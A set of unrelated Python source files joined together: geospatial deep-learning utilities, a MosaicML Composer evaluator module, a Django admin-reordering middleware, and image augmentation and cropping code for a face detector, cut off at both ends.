is used to pad all borders. If tuple of length 2 is provided this is the padding
on left/right and top/bottom respectively. If a tuple of length 4 is provided
this is the padding for the left, top, right and bottom borders
respectively.
fill: Pixel fill value for constant fill. Default is 0. If a tuple of
length 3, it is used to fill R, G, B channels respectively.
This value is only used when the padding_mode is constant
Returns:
ndarray: Padded image.
"""
if not isinstance(padding, (numbers.Number, tuple)):
raise TypeError('Got inappropriate padding arg')
if not isinstance(fill, (numbers.Number, str, tuple)):
raise TypeError('Got inappropriate fill arg')
if isinstance(padding, Sequence) and len(padding) not in [2, 4]:
raise ValueError("Padding must be an int or a 2, or 4 element tuple, not a " +
"{} element tuple".format(len(padding)))
if isinstance(padding, int):
pad_left = pad_right = pad_top = pad_bottom = padding
if isinstance(padding, Sequence) and len(padding) == 2:
pad_left = pad_right = padding[0]
pad_top = pad_bottom = padding[1]
if isinstance(padding, Sequence) and len(padding) == 4:
pad_left = padding[0]
pad_top = padding[1]
pad_right = padding[2]
pad_bottom = padding[3]
# RGB image
if len(img.shape) == 3:
img = np.pad(img, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode='constant', constant_values=fill)
# Grayscale image
elif len(img.shape) == 2:
img = np.pad(img, ((pad_top, pad_bottom), (pad_left, pad_right)), mode='constant', constant_values=fill)
return img
def pad_diff(actual_height, actual_width, desired_height, desired_width):
""" Pads img_arr width or height < samples_size with zeros """
h_diff = desired_height - actual_height
w_diff = desired_width - actual_width
padding = (0, 0, w_diff, h_diff) # left, top, right, bottom
return padding
def unnormalize(input_img, mean, std):
"""
:param input_img: (numpy array) Image to be "unnormalized"
:param mean: (list of mean values) for each channel
:param std: (list of std values) for each channel
:return: (numpy_array) "Unnormalized" image
"""
return (input_img * std) + mean
def BGR_to_RGB(array):
assert array.shape[2] >= 3, f"Not enough channels in array of shape {array.shape}"
BGR_channels = array[..., :3]
RGB_channels = np.ascontiguousarray(BGR_channels[..., ::-1])
array[:, :, :3] = RGB_channels
return array
def ind2rgb(arr, color):
"""
:param arr: (numpy array) index image to be color mapped
:param color: (dict of RGB color values) for each class
:return: (numpy_array) RGB image
"""
h, w = arr.shape
rgb = np.empty((h, w, 3), dtype=np.uint8)
for cl in color:
for ch in range(3):
rgb[..., ch][arr == cl] = (color[cl][ch])
return rgb
def is_url(url):
if urlparse(url).scheme in ('http', 'https', 's3'):
return True
else:
return False
def checkpoint_url_download(url: str):
mime_type = ('application/tar', 'application/x-tar', 'applicaton/x-gtar',
'multipart/x-tar', 'application/x-compress', 'application/x-compressed')
try:
response = requests.head(url)
if response.headers['content-type'] in mime_type:
working_folder = Path.cwd().joinpath('inference_out')
Path.mkdir(working_folder, parents=True, exist_ok=True)
checkpoint_path = working_folder.joinpath(Path(url).name)
r = requests.get(url)
checkpoint_path.write_bytes(r.content)
print(checkpoint_path)
return checkpoint_path
else:
raise SystemExit('Invalid Url, checkpoint content not detected')
except requests.exceptions.RequestException as e:
raise SystemExit(e)
def list_input_images(img_dir_or_csv: str,
bucket_name: str = None,
glob_patterns: List = None):
"""
Create list of images from given directory or csv file.
:param img_dir_or_csv: (str) directory containing input images or csv with list of images
:param bucket_name: (str, optional) name of aws s3 bucket
:param glob_patterns: (list of str) if directory is given as input (not csv), these are the glob patterns that will be used
to find desired images
returns list of dictionaries where keys are "tif" and values are paths to found images. "meta" key is also added
if input is csv and second column contains a metadata file. Then, value is path to metadata file.
"""
if bucket_name:
s3 = boto3.resource('s3')
bucket = s3.Bucket(bucket_name)
if img_dir_or_csv.endswith('.csv'):
bucket.download_file(img_dir_or_csv, 'img_csv_file.csv')
list_img = read_csv('img_csv_file.csv')
else:
raise NotImplementedError(
'Specify a csv file containing images for inference. Directory input not implemented yet')
else:
if img_dir_or_csv.endswith('.csv'):
list_img = read_csv(img_dir_or_csv)
elif is_url(img_dir_or_csv):
list_img = []
img_path = Path(img_dir_or_csv)
img = {}
img['tif'] = img_path
list_img.append(img)
else:
img_dir = Path(img_dir_or_csv)
assert img_dir.is_dir() or img_dir.is_file(), f'Could not find directory/file "{img_dir_or_csv}"'
list_img_paths = set()
if img_dir.is_dir():
for glob_pattern in glob_patterns:
assert isinstance(glob_pattern, str), f'Invalid glob pattern: "{glob_pattern}"'
list_img_paths.update(sorted(img_dir.glob(glob_pattern)))
else:
list_img_paths.update(img_dir)
list_img = []
for img_path in list_img_paths:
img = {}
img['tif'] = img_path
list_img.append(img)
assert len(list_img) >= 0, f'No .tif files found in {img_dir_or_csv}'
return list_img
def read_csv(csv_file_name):
"""
Open csv file and parse it, returning a list of dict.
- tif full path
- metadata yml full path (may be empty string if unavailable)
- gpkg full path
- attribute_name
- dataset (trn or tst)
"""
list_values = []
with open(csv_file_name, 'r') as f:
reader = csv.reader(f)
for index, row in enumerate(reader):
row_length = len(row) if index == 0 else row_length
assert len(row) == row_length, "Rows in csv should be of same length"
row.extend([None] * (5 - len(row))) # fill row with None values to obtain row of length == 5
list_values.append({'tif': row[0], 'meta': row[1], 'gpkg': row[2], 'attribute_name': row[3], 'dataset': row[4]})
assert Path(row[0]).is_file(), f'Tif raster not found "{row[0]}"'
if row[2]:
assert Path(row[2]).is_file(), f'Gpkg not found "{row[2]}"'
assert isinstance(row[3], str)
try:
# Try sorting according to dataset name (i.e. group "train", "val" and "test" rows together)
list_values = sorted(list_values, key=lambda k: k['dataset'])
except TypeError:
logging.warning('Unable to sort csv rows')
return list_values
def add_metadata_from_raster_to_sample(sat_img_arr: np.ndarray,
raster_handle: dict,
meta_map: dict,
raster_info: dict
) -> dict:
"""
:param sat_img_arr: source image as array (opened with rasterio.read)
:param meta_map: meta map parameter from yaml (global section)
:param raster_info: info from raster as read with read_csv (except at inference)
:return: Returns a metadata dictionary populated with info from source raster, including original csv line and
histogram.
"""
metadata_dict = {'name': raster_handle.name, 'csv_info': raster_info, 'source_raster_bincount': {}}
assert 'dtype' in raster_handle.meta.keys(), "\"dtype\" could not be found in source image metadata"
metadata_dict.update(raster_handle.meta)
if not metadata_dict['dtype'] in ["uint8", "uint16"]:
warnings.warn(f"Datatype should be \"uint8\" or \"uint16\". Got \"{metadata_dict['dtype']}\". ")
if sat_img_arr.min() >= 0 and sat_img_arr.max() <= 255:
metadata_dict['dtype'] = "uint8"
elif sat_img_arr.min() >= 0 and sat_img_arr.max() <= 65535:
metadata_dict['dtype'] = "uint16"
else:
raise NotImplementedError(f"Min and max values of array ({[sat_img_arr.min(), sat_img_arr.max()]}) "
f"are not contained in 8 bit nor 16 bit range. Datatype cannot be overwritten.")
# Save bin count (i.e. histogram) to metadata
assert isinstance(sat_img_arr, np.ndarray) and len(sat_img_arr.shape) == 3, f"Array should be 3-dimensional"
for band_index in range(sat_img_arr.shape[2]):
band = sat_img_arr[..., band_index]
metadata_dict['source_raster_bincount'][f'band{band_index}'] = {count for count in np.bincount(band.flatten())}
if meta_map and Path(raster_info['meta']).is_file():
if not raster_info['meta'] is not None and isinstance(raster_info['meta'], str):
raise ValueError("global configuration requested metadata mapping onto loaded "
"samples, but raster did not have available metadata")
yaml_metadata = read_parameters(raster_info['meta'])
metadata_dict.update(yaml_metadata)
return metadata_dict
#### Image Patches Smoothing Functions ####
""" Adapted from : https://github.com/Vooban/Smoothly-Blend-Image-Patches """
def _spline_window(window_size, power=2):
"""
Squared spline (power=2) window function:
https://www.wolframalpha.com/input/?i=y%3Dx**2,+y%3D-(x-2)**2+%2B2,+y%3D(x-4)**2,+from+y+%3D+0+to+2
"""
intersection = int(window_size/4)
wind_outer = (abs(2*(scipy.signal.triang(window_size))) ** power)/2
wind_outer[intersection:-intersection] = 0
wind_inner = 1 - (abs(2*(scipy.signal.triang(window_size) - 1)) ** power)/2
wind_inner[:intersection] = 0
wind_inner[-intersection:] = 0
wind = wind_inner + wind_outer
wind = wind / np.average(wind)
return wind
cached_2d_windows = dict()
def _window_2D(window_size, power=2):
"""
Make a 1D window function, then infer and return a 2D window function.
Done with an augmentation, and self multiplication with its transpose.
Could be generalized to more dimensions.
"""
# Memoization
global cached_2d_windows
key = "{}_{}".format(window_size, power)
if key in cached_2d_windows:
wind = cached_2d_windows[key]
else:
wind = _spline_window(window_size, power)
wind = np.expand_dims(np.expand_dims(wind, 1), -1)
wind = wind * wind.transpose(1, 0, 2)
cached_2d_windows[key] = wind
return wind
def get_git_hash():
"""
Get git hash during execution of python script
:return: (str) hash code for current version of geo-deep-learning. If necessary, the code associated to this hash can be
found with the following url: https://github.com/<owner>/<project>/commit/<hash>, aka
https://github.com/NRCan/geo-deep-learning/commit/<hash>
"""
command = f'git rev-parse --short HEAD'
subproc = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
git_hash = str(subproc.stdout, "utf-8").replace("\n", "")
# when code not executed from git repo, subprocess outputs return code #128. This has been tested.
# Reference: https://stackoverflow.com/questions/58575970/subprocess-call-with-exit-status-128
if subproc.returncode == 128:
logging.warning(f'No git repo associated to this code.')
return None
return git_hash
def ordereddict_eval(str_to_eval: str):
"""
Small utility to successfully evaluate an ordereddict object that was converted to str by repr() function.
:param str_to_eval: (str) string to prepared for import with eval()
"""
try:
# Replaces "ordereddict" string to "Collections.OrderedDict"
if isinstance(str_to_eval, bytes):
str_to_eval = str_to_eval.decode('UTF-8')
str_to_eval = str_to_eval.replace("ordereddict", "collections.OrderedDict")
return eval(str_to_eval)
except Exception:
logging.exception(f'Object of type \"{type(str_to_eval)}\" cannot not be evaluated. Problems may occur.')
return str_to_eval
def compare_config_yamls(yaml1: dict, yaml2: dict, update_yaml1: bool = False) -> List:
"""
Checks if values for same keys or subkeys (max depth of 2) of two dictionaries match.
:param yaml1: (dict) first dict to evaluate
:param yaml2: (dict) second dict to evaluate
:param update_yaml1: (bool) it True, values in yaml1 will be replaced with values in yaml2,
if the latters are different
:return: dictionary of keys or subkeys for which there is a value mismatch if there is, or else returns None
"""
if not (isinstance(yaml1, dict) or isinstance(yaml2, dict)):
raise TypeError(f"Expected both yamls to be dictionaries. \n"
f"Yaml1's type is {type(yaml1)}\n"
f"Yaml2's type is {type(yaml2)}")
for section, params in yaml2.items(): # loop through main sections of config yaml ('global', 'sample', etc.)
if section not in yaml1.keys(): # create key if not in dictionary as we loop
yaml1[section] = {}
for param, val2 in params.items(): # loop through parameters of each section ('samples_size','debug_mode',...)
if param not in yaml1[section].keys(): # create key if not in dictionary as we loop
yaml1[section][param] = {}
# set to None if no value for that key
val1 = get_key_def(param, yaml1[section], default=None)
if isinstance(val2, dict): # if value is a dict, loop again to fetch end val (only recursive twice)
for subparam, subval2 in val2.items():
if subparam not in yaml1[section][param].keys(): # create key if not in dictionary as we loop
yaml1[section][param][subparam] = {}
# set to None if no value for that key
subval1 = get_key_def(subparam, yaml1[section][param], default=None)
if subval2 != subval1:
# if value doesn't match between yamls, emit warning
logging.warning(f"YAML value mismatch: section \"{section}\", key \"{param}/{subparam}\"\n"
f"Current yaml value: \"{subval1}\"\nHDF5s yaml value: \"{subval2}\"\n")
if update_yaml1: # update yaml1 with subvalue of yaml2
yaml1[section][param][subparam] = subval2
logging.info(f'Value in yaml1 updated')
elif val2 != val1:
logging.warning(f"YAML value mismatch: section \"{section}\", key \"{param}\"\n"
f"Current yaml value: \"{val2}\"\nHDF5s yaml value: \"{val1}\"\n"
f"Problems may occur.")
if update_yaml1: # update yaml1 with value of yaml2
yaml1[section][param] = val2
logging.info(f'Value in yaml1 updated')
|
<reponame>Landanjs/composer
# Copyright 2022 MosaicML Composer authors
# SPDX-License-Identifier: Apache-2.0
"""A wrapper for a dataloader to include metrics that apply to a specific dataset."""
from __future__ import annotations
import copy
from typing import Any, Callable, Dict, Iterable, Optional, Union
from torchmetrics import Metric, MetricCollection
from composer.core.data_spec import DataSpec, ensure_data_spec
from composer.core.event import Event
from composer.core.state import State
from composer.core.time import Time, TimeUnit
__all__ = ["Evaluator", "evaluate_periodically", "ensure_evaluator"]
def evaluate_periodically(eval_interval: Union[str, Time, int], eval_at_fit_end: bool = True):
"""Helper function to generate an evaluation interval callable.
Args:
eval_interval (str | Time | int): A :class:`.Time` instance or time string, or integer in epochs,
representing how often to evaluate. Set to ``0`` to disable evaluation.
eval_at_fit_end (bool): Whether to evaluate at the end of training, regardless of `eval_interval`.
Default: True
Returns:
(State, Event) -> bool: A callable for the ``eval_interval`` argument of an :class:`.Evaluator`.
"""
if isinstance(eval_interval, int):
eval_interval = Time(eval_interval, TimeUnit.EPOCH)
if isinstance(eval_interval, str):
eval_interval = Time.from_timestring(eval_interval)
if eval_interval.unit not in (TimeUnit.EPOCH, TimeUnit.BATCH):
raise ValueError("The `eval_interval` must have units of EPOCH or BATCH, or be a function.")
last_batch_seen = -1
def should_eval(state: State, event: Event):
if int(eval_interval) <= 0:
return False
nonlocal last_batch_seen # required to use the last_batch_seen from the outer function scope
# if requested, evaluate at the end of training, as long as the length of training is specified.
if eval_at_fit_end and event == Event.FIT_END and state.timestamp.batch != last_batch_seen:
return True
if eval_interval.unit == TimeUnit.EPOCH and int(
state.timestamp.epoch) % int(eval_interval) == 0 and event == Event.EPOCH_END:
last_batch_seen = state.timestamp.batch
return True
if eval_interval.unit == TimeUnit.BATCH and int(
state.timestamp.batch) % int(eval_interval) == 0 and event == Event.BATCH_END:
last_batch_seen = state.timestamp.batch
return True
return False
return should_eval
class Evaluator:
"""A wrapper for a dataloader to include metrics that apply to a specific dataset.
For example, :class:`~.nlp_metrics.CrossEntropyLoss` metric for NLP models.
.. doctest::
>>> from torchmetrics.classification.accuracy import Accuracy
>>> eval_evaluator = Evaluator(label="myEvaluator", dataloader=eval_dataloader, metrics=Accuracy())
>>> trainer = Trainer(
... model=model,
... train_dataloader=train_dataloader,
... eval_dataloader=eval_evaluator,
... optimizers=optimizer,
... max_duration="1ep",
... )
.. testcleanup::
trainer.engine.close()
Args:
label (str): Name of the Evaluator
dataloader (DataSpec | Iterable | Dict[str, Any]): Iterable that yields batches, a :class:`.DataSpec` for evaluation,
or a Dict of :class:`.DataSpec` kwargs.
metrics (Metric | MetricCollection): :class:`torchmetrics.Metric` to log. ``metrics`` will be deep-copied to
ensure that each evaluator updates only its ``metrics``.
subset_num_batches (int, optional): The maximum number of batches to use for each evaluation. Defaults to
``None``, which means that the ``eval_subset_num_batches`` parameter from the
:class:`~composer.trainer.trainer.Trainer` will be used.
Set to ``-1`` to evaluate the entire ``dataloader``
eval_interval (int | str | Time | (State, Event) -> bool, optional): An integer, which will be
interpreted to be epochs, a str (e.g. ``1ep``, or ``10ba``), a :class:`.Time` object, or a callable.
Defaults to ``None``, which means that the ``eval_interval`` parameter from the
:class:`~composer.trainer.trainer.Trainer` will be used.
If an integer (in epochs), :class:`.Time` string, or :class:`.Time` instance, the evaluator will be run
with this frequency. :class:`.Time` strings or :class:`.Time` instances must have units of
:attr:`.TimeUnit.BATCH` or :attr:`.TimeUnit.EPOCH`.
Set to ``0`` to disable evaluation.
If a callable, it should take two arguments (:class:`.State`, :class:`.Event`) and return a bool
representing whether the evaluator should be invoked. The event will be either :attr:`.Event.BATCH_END`
or :attr:`.Event.EPOCH_END`.
When specifying ``eval_interval``, the evaluator(s) are also run at the ``Event.FIT_END`` if it doesn't
evenly divide the training duration.
"""
_eval_interval: Optional[Callable[[State, Event], bool]]
def __init__(
self,
*,
label: str,
dataloader: Union[DataSpec, Iterable, Dict[str, Any]],
metrics: Union[Metric, MetricCollection],
subset_num_batches: Optional[int] = None,
eval_interval: Optional[Union[int, str, Time, Callable[[State, Event], bool]]] = None,
):
self.label = label
self.dataloader = ensure_data_spec(dataloader)
# Forcing metrics to be a MetricCollection simplifies logging results
metrics = copy.deepcopy(metrics)
if isinstance(metrics, Metric):
self.metrics = MetricCollection([metrics])
else:
self.metrics = metrics
self.subset_num_batches = subset_num_batches
self.eval_interval = eval_interval
@property
def eval_interval(self):
return self._eval_interval
@eval_interval.setter
def eval_interval(self, eval_interval: Optional[Union[int, str, Time, Callable[[State, Event], bool]]]):
if eval_interval is None:
self._eval_interval = None
elif not callable(eval_interval):
self._eval_interval = evaluate_periodically(eval_interval)
else:
self._eval_interval = eval_interval
def ensure_evaluator(evaluator: Union[Evaluator, DataSpec, Iterable, Dict[str, Any]],
default_metrics: Union[Metric, MetricCollection]):
"""Ensure that ``evaluator`` is an :class:`.Evaluator`.
Args:
evaluator (Evaluator | DataSpec | Iterable | Dict[str, Any]): A dataloader,
:class:`.DataSpec` instance, dictionary of :class:`.DataSpec` kwargs, or existing evaluator.
default_metrics (Union[Metric, MetricCollection]): The metrics for the ``evaluator``, if a datalaoder was specified.
Returns:
Evaluator: An evaluator.
"""
if isinstance(evaluator, Evaluator):
return evaluator
else:
return Evaluator(
label="eval",
dataloader=evaluator,
metrics=default_metrics,
)
|
<gh_stars>0
from copy import deepcopy
from django.conf import settings
from django.contrib import admin
from django.core.exceptions import ImproperlyConfigured
from django.urls import resolve, Resolver404
from django.utils.deprecation import MiddlewareMixin
class ModelAdminReorder(MiddlewareMixin):
settings_variable_name = 'ADMIN_REORDER'
def init_config(self, request, app_list):
self.request = request
self.app_list = app_list
self.config = getattr(settings, self.settings_variable_name, None)
if not self.config:
# ADMIN_REORDER settings is not defined.
raise ImproperlyConfigured(f'{self.settings_variable_name} config is not defined.')
if not isinstance(self.config, (tuple, list)):
raise ImproperlyConfigured(
'{name} config parameter must be tuple or list. '
'Got {config}'.format(name=self.settings_variable_name, config=self.config))
# admin_index = admin.site.index(request)
admin_site = self.get_admin_site()
admin_index = admin_site.index(request)
try:
# try to get all installed models
app_list = admin_index.context_data['app_list']
except KeyError:
# use app_list from context if this fails
pass
# Flatten all models from apps
self.models_list = []
for app in app_list:
for model in app['models']:
model['model_name'] = self.get_model_name(
app['app_label'], model['object_name'])
self.models_list.append(model)
def get_admin_site(self):
return admin.site
def get_app_list(self):
ordered_app_list = []
for app_config in self.config:
app = self.make_app(app_config)
if app:
ordered_app_list.append(app)
return ordered_app_list
def make_app(self, app_config):
if not isinstance(app_config, (dict, str)):
raise TypeError('{name} list item must be '
'dict or string. Got {config}'.format(
name=self.settings_variable_name, config=repr(app_config)
))
if isinstance(app_config, str):
# Keep original label and models
return self.find_app(app_config)
else:
return self.process_app(app_config)
def find_app(self, app_label):
for app in self.app_list:
if app['app_label'] == app_label:
return app
def get_model_name(self, app_name, model_name):
if '.' not in model_name:
model_name = '%s.%s' % (app_name, model_name)
return model_name
def process_app(self, app_config):
if 'app' not in app_config:
raise NameError('{name} list item must define '
'a "app" name. Got {config}'.format(
name=self.settings_variable_name,
config=repr(app_config)
))
app = self.find_app(app_config['app'])
if app:
app = deepcopy(app)
# Rename app
if 'label' in app_config:
app['name'] = app_config['label']
# Process app models
if 'models' in app_config:
models_config = app_config.get('models')
models = self.process_models(models_config)
if models:
app['models'] = models
else:
return None
return app
def process_models(self, models_config):
if not isinstance(models_config, (dict, list, tuple)):
raise TypeError('"models" config for {name} list '
'item must be dict or list/tuple. '
'Got {config}'.format(
name=self.settings_variable_name,
config=repr(models_config)
))
ordered_models_list = []
for model_config in models_config:
model = None
if isinstance(model_config, dict):
model = self.process_model(model_config)
else:
model = self.find_model(model_config)
if model:
ordered_models_list.append(model)
return ordered_models_list
def find_model(self, model_name):
for model in self.models_list:
if model['model_name'] == model_name:
return model
def process_model(self, model_config):
# Process model defined as { model: 'model', 'label': 'label' }
for key in ('model', 'label', ):
if key not in model_config:
return
model = self.find_model(model_config['model'])
if model:
model['name'] = model_config['label']
return model
def get_admin_site_url_names(self):
"""
List of admin site url_names where to apply middleware logic
"""
return ['index', 'app_list']
def process_template_response(self, request, response):
try:
url = resolve(request.path_info)
except Resolver404:
return response
if not url.app_name == 'admin' and \
url.url_name not in self.get_admin_site_url_names():
# current view is not a django admin index
# or app_list view, bail out!
return response
if 'app_list' in response.context_data:
app_list = response.context_data['app_list']
context_key = 'app_list'
elif 'available_apps' in response.context_data:
app_list = response.context_data['available_apps']
context_key = 'available_apps'
else:
# there is no app_list! nothing to reorder
return response
self.init_config(request, app_list)
ordered_app_list = self.get_app_list()
response.context_data[context_key] = ordered_app_list
return response
class ModelAdminReorderMiddlewareMixin(ModelAdminReorder):
"""
If you have multiple admin, then you can:
1) define your own middleware class inherited from ModelAdminReorderMiddlewareMixin
2) set settings_variable_name attribute
3) overwrite get_admin_site() method to return another admin.site
4) overwirte get_admin_site_url_names() method with appending your custom urls names
"""
# def get_admin_site(self):
# return short_admin_site
# def get_admin_site_url_names(self):
# names = super().get_admin_site_url_names()
# names.append('short_admin_index')
# return names
|
from __future__ import print_function
import numpy as np
import cv2
import os
import math
import sys
import random
from utils.config import config
def brightness_aug(src, x):
alpha = 1.0 + random.uniform(-x, x)
src *= alpha
return src
def contrast_aug(src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = (3.0 * (1.0 - alpha) / gray.size) * np.sum(gray)
src *= alpha
src += gray
return src
def saturation_aug(src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = np.sum(gray, axis=2, keepdims=True)
gray *= (1.0 - alpha)
src *= alpha
src += gray
return src
def color_aug(img, x):
augs = [brightness_aug, contrast_aug, saturation_aug]
random.shuffle(augs)
for aug in augs:
#print(img.shape)
img = aug(img, x)
#print(img.shape)
return img
def get_image(roidb, scale=False):
"""
preprocess image and return processed roidb
:param roidb: a list of roidb
:return: list of img as in mxnet format
roidb add new item['im_info']
0 --- x (width, second dim of im)
|
y (height, first dim of im)
"""
num_images = len(roidb)
processed_ims = []
processed_roidb = []
for i in range(num_images):
roi_rec = roidb[i]
if 'stream' in roi_rec:
im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
else:
assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
im = cv2.imread(roi_rec['image'])
if roidb[i]['flipped']:
im = im[:, ::-1, :]
new_rec = roi_rec.copy()
if scale:
scale_range = config.TRAIN.SCALE_RANGE
im_scale = np.random.uniform(scale_range[0], scale_range[1])
im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
elif not config.ORIGIN_SCALE:
scale_ind = random.randrange(len(config.SCALES))
target_size = config.SCALES[scale_ind][0]
max_size = config.SCALES[scale_ind][1]
im, im_scale = resize(im, target_size, max_size, stride=config.IMAGE_STRIDE)
else:
im_scale = 1.0
im_tensor = transform(im, config.PIXEL_MEANS)
if 'boxes_mask' in roi_rec:
im = im.astype(np.float32)
boxes_mask = roi_rec['boxes_mask'].copy() * im_scale
boxes_mask = boxes_mask.astype(np.int)
for j in range(boxes_mask.shape[0]):
m = boxes_mask[j]
im_tensor[:,:,m[1]:m[3],m[0]:m[2]] = 0.0
#print('find mask', m, file=sys.stderr)
processed_ims.append(im_tensor)
new_rec['boxes'] = roi_rec['boxes'].copy() * im_scale
if config.TRAIN.IMAGE_ALIGN>0:
if im_tensor.shape[2]%config.TRAIN.IMAGE_ALIGN!=0 or im_tensor.shape[3]%config.TRAIN.IMAGE_ALIGN!=0:
new_height = math.ceil(float(im_tensor.shape[2])/config.TRAIN.IMAGE_ALIGN)*config.TRAIN.IMAGE_ALIGN
new_width = math.ceil(float(im_tensor.shape[3])/config.TRAIN.IMAGE_ALIGN)*config.TRAIN.IMAGE_ALIGN
new_im_tensor = np.zeros((1, 3, int(new_height), int(new_width)))
new_im_tensor[:,:,0:im_tensor.shape[2],0:im_tensor.shape[3]] = im_tensor
print(im_tensor.shape, new_im_tensor.shape, file=sys.stderr)
im_tensor = new_im_tensor
#print('boxes', new_rec['boxes'], file=sys.stderr)
im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
new_rec['im_info'] = im_info
processed_roidb.append(new_rec)
return processed_ims, processed_roidb
TMP_ID = 0
#bakup method
def __get_crop_image(roidb):
"""
preprocess image and return processed roidb
:param roidb: a list of roidb
:return: list of img as in mxnet format
roidb add new item['im_info']
0 --- x (width, second dim of im)
|
y (height, first dim of im)
"""
#roidb and each roi_rec can not be changed as it will be reused in next epoch
num_images = len(roidb)
processed_ims = []
processed_roidb = []
for i in range(num_images):
roi_rec = roidb[i]
if 'stream' in roi_rec:
im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
else:
assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
im = cv2.imread(roi_rec['image'])
if roidb[i]['flipped']:
im = im[:, ::-1, :]
if 'boxes_mask' in roi_rec:
#im = im.astype(np.float32)
boxes_mask = roi_rec['boxes_mask'].copy()
boxes_mask = boxes_mask.astype(np.int)
for j in range(boxes_mask.shape[0]):
m = boxes_mask[j]
im[m[1]:m[3],m[0]:m[2],:] = 0
#print('find mask', m, file=sys.stderr)
new_rec = roi_rec.copy()
#choose one gt randomly
SIZE = config.SCALES[0][0]
TARGET_BOX_SCALES = np.array([16,32,64,128,256,512])
assert roi_rec['boxes'].shape[0]>0
candidates = []
for i in range(roi_rec['boxes'].shape[0]):
box = roi_rec['boxes'][i]
box_size = max(box[2]-box[0], box[3]-box[1])
if box_size<config.TRAIN.MIN_BOX_SIZE:
continue
#if box[0]<0 or box[1]<0:
# continue
#if box[2]>im.shape[1] or box[3]>im.shape[0]:
# continue;
candidates.append(i)
assert len(candidates)>0
box_ind = random.choice(candidates)
box = roi_rec['boxes'][box_ind]
box_size = max(box[2]-box[0], box[3]-box[1])
dist = np.abs(TARGET_BOX_SCALES - box_size)
nearest = np.argmin(dist)
target_ind = random.randrange(min(len(TARGET_BOX_SCALES), nearest+2))
target_box_size = TARGET_BOX_SCALES[target_ind]
im_scale = float(target_box_size) / box_size
#min_scale = float(SIZE)/np.min(im.shape[0:2])
#if im_scale<min_scale:
# im_scale = min_scale
im = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)
new_rec['boxes'] = roi_rec['boxes'].copy()*im_scale
box_scale = new_rec['boxes'][box_ind].copy().astype(np.int)
ul_min = box_scale[2:4] - SIZE
ul_max = box_scale[0:2]
assert ul_min[0]<=ul_max[0]
assert ul_min[1]<=ul_max[1]
#print('ul', ul_min, ul_max, box)
up, left = np.random.randint(ul_min[1], ul_max[1]+1), np.random.randint(ul_min[0], ul_max[0]+1)
#print('box', box, up, left)
M = [ [1.0, 0.0, -left],
[0.0, 1.0, -up], ]
M = np.array(M)
im = cv2.warpAffine(im, M, (SIZE, SIZE), borderValue = tuple(config.PIXEL_MEANS))
#tbox = np.array([left, left+SIZE, up, up+SIZE], dtype=np.int)
#im_new = np.zeros( (SIZE, SIZE,3), dtype=im.dtype)
#for i in range(3):
# im_new[:,:,i] = config.PIXEL_MEANS[i]
new_rec['boxes'][:,0] -= left
new_rec['boxes'][:,2] -= left
new_rec['boxes'][:,1] -= up
new_rec['boxes'][:,3] -= up
box_trans = new_rec['boxes'][box_ind].copy().astype(np.int)
#print('sel box', im_scale, box, box_scale, box_trans, file=sys.stderr)
#print('before', new_rec['boxes'].shape[0])
boxes_new = []
classes_new = []
for i in range(new_rec['boxes'].shape[0]):
box = new_rec['boxes'][i]
box_size = max(box[2]-box[0], box[3]-box[1])
center = np.array(([box[0], box[1]]+[box[2], box[3]]))/2
if center[0]<0 or center[1]<0 or center[0]>=im.shape[1] or center[1]>=im.shape[0]:
continue
if box_size<config.TRAIN.MIN_BOX_SIZE:
continue
boxes_new.append(box)
classes_new.append(new_rec['gt_classes'][i])
new_rec['boxes'] = np.array(boxes_new)
new_rec['gt_classes'] = np.array(classes_new)
#print('after', new_rec['boxes'].shape[0])
#assert new_rec['boxes'].shape[0]>0
DEBUG = True
if DEBUG:
global TMP_ID
if TMP_ID<10:
tim = im.copy()
for i in range(new_rec['boxes'].shape[0]):
box = new_rec['boxes'][i].copy().astype(np.int)
cv2.rectangle(tim, (box[0], box[1]), (box[2], box[3]), (255, 0, 0), 1)
filename = './tmp/D%d.png' % TMP_ID
TMP_ID+=1
cv2.imwrite(filename, tim)
im_tensor = transform(im, config.PIXEL_MEANS)
processed_ims.append(im_tensor)
#print('boxes', new_rec['boxes'], file=sys.stderr)
im_info = [im_tensor.shape[2], im_tensor.shape[3], im_scale]
new_rec['im_info'] = im_info
processed_roidb.append(new_rec)
return processed_ims, processed_roidb
def get_crop_image(roidb):
"""
preprocess image and return processed roidb
:param roidb: a list of roidb
:return: list of img as in mxnet format
roidb add new item['im_info']
0 --- x (width, second dim of im)
|
y (height, first dim of im)
"""
#roidb and each roi_rec can not be changed as it will be reused in next epoch
num_images = len(roidb)
processed_ims = []
processed_roidb = []
for i in range(num_images):
roi_rec = roidb[i]
if 'stream' in roi_rec:
im = cv2.imdecode(roi_rec['stream'], cv2.IMREAD_COLOR)
else:
assert os.path.exists(roi_rec['image']), '{} does not exist'.format(roi_rec['image'])
im = cv2.imread(roi_rec['image'])
if roidb[i]['flipped']:
im = im[:, ::-1, :]
if 'boxes_mask' in roi_rec:
#im = im.astype(np.float32)
boxes_mask = roi_rec['boxes_mask'].copy()
boxes_mask = boxes_mask.astype(np.int)
for j in range(boxes_mask.shape[0]):
m = boxes_mask[j]
im[m[1]:m[3],m[0]:m[2],:] = 0
#print('find mask', m, file=sys.stderr)
SIZE = config.SCALES[0][0]
_scale = random.choice(config.PRE_SCALES)
size = int(np.round(_scale*np.min(im.shape[0:2])))
im_scale = float(SIZE)/size
origin_shape = im.shape
if _scale>10.0: #avoid im.size<SIZE, never?
sizex = int(np.round(im.shape[1]*im_scale))
sizey = int(np.round(im.shape[0]*im_scale))
if sizex<SIZE:
sizex = SIZE
print('keepx', sizex)
if sizey<SIZE:
sizey = SIZE
print('keepy', sizex)
im = cv2.resize(im, (sizex, sizey), interpolation=cv2.INTER_LINEAR)
else:
